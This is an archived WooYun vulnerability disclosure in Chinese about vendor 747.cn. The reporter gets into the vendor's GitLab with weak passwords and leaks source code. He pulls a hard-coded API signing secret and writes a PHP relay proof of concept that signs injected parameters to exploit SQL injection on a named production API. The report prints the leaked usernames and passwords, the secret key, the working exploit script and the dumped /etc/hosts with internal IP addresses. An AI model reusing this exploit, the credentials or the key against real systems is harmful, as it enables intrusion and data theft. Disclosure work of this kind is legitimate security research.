破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

北京黑米git弱口令导致SQL注入(参数签名中转注射案例)

编号215977
Urlhttp://www.wooyun.org/bug.php?action=view&id=215977
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题北京黑米git弱口令导致SQL注入(参数签名中转注射案例)
漏洞类型SQL注射漏洞
厂商747.cn
白帽子scanf
提交日期2016-06-03 19:31:00
公开日期2016-07-09 16:30:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank0
漏洞简介
.
漏洞细节

http://git.747.cn/users/sign_in 跑了一下
zhangxuan 123456
还有个管理员权限的 liuchao 123456
可以添加用户和添加进项目小组里面
泄漏各种项目源码

QQ截图20160603190737.jpg


QQ截图20160603190720.jpg


QQ截图20160603190744.jpg


http://git.747.cn/zhangxuan/heimilink_api/blob/master/heimi_api%20interface.txt
发现了一个这个文档 结合前面提交的注入觉得一定有注入.
由于其他的要验证登录了没有就只有第4个了
4. 获取用户渠道编号
访问地址: 根域名 + /user/info/getchannelid?hm_uid=[用户ID]&hm_dateline=[时间截]&hm_sign=[数字签名]
签名生成方法:
$sign = sha1( 用户ID . SEC秘钥 . 时间截) ;
示例: http://hmapi.showboom.cn/user/info/getchannelid?hm_uid=17&hm_dateline=1453345011&hm_sign=e9ed25d7cb259a4ed9eb1df1aaddeaa150622072
嗯 hm_uid hm_dateline知道
SECSEC秘钥在php里面
http://git.747.cn/zhangxuan/heimilink_api/blob/master/application/modules/User/controllers/Info.php
加密算法知道了
我们写个脚本

QQ截图20160603185421.jpg


QQ截图20160603185504.jpg


嗯存在注入
写个中转吧.

POC

<?php
$SEC = '0d70d259cd54875a44654f5e856df327';
$userid = stripslashes($_GET['userid']);
$dateline= '1453345011';
$sign = sha1( $userid . $SEC . $dateline) ;
$uri = 'https://hmapi.showboom.cn/user/info/getchannelid?hm_uid='.$userid.'&hm_dateline=1453345011&hm_sign='.$sign;
$header = array();
$ch = curl_init ();
curl_setopt ( $ch, CURLOPT_URL, $uri );
curl_setopt ( $ch, CURLOPT_HEADER, 1 );
curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 );
//https
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
$return = curl_exec ( $ch );
curl_close ( $ch );
{echo $return;}
?>


user

QQ截图20160603190050.jpg


读取/etc/hosts

127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
10.0.2.251 a1801
10.0.2.10 a1802
10.0.2.11 a1803
10.0.2.12 a1804
10.0.2.13 a1805
10.0.2.14 a1806
10.0.2.15 a1807
10.0.2.16 a1808
10.0.2.17 a1809
10.0.2.18 a1810
10.0.3.10 a1701
10.0.3.11 a1702
10.0.3.12 a1703
10.0.3.13 a1704
10.0.3.14 a1705
10.0.3.15 a1706
10.0.3.16 a1707
10.0.3.17 a1708
10.0.3.18 a1709
10.0.3.19 a1710
10.0.3.20 a1711
10.0.3.21 a1712
10.0.2.19 a1602
10.0.2.20 a1603
10.0.2.6 a1604
10.0.2.8 a1605
10.0.2.7 a1606
10.0.2.21 a1607
10.0.2.22 a1608
10.0.2.23 a1609
10.0.2.24 a1610
10.0.2.25 a1611
10.0.3.51 a1501
10.0.3.52 a1502
10.0.3.53 a1503
10.0.3.54 a1504
10.0.3.55 a1505
10.0.3.56 a1506
10.0.3.57 a1507
10.0.3.58 a1508
10.0.3.59 a1509


内网服务器好多.

QQ截图20160603190503.jpg


修复方案

额 看了一下源码发现几乎都没有过滤或者参数化查询语句.

状态信息 2016-06-03: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-09: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-07-09 16:30
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

然后他送了个WiFi盒子给你还是3G的那种。。。。

窝窝哥02016-06-04 12:27:00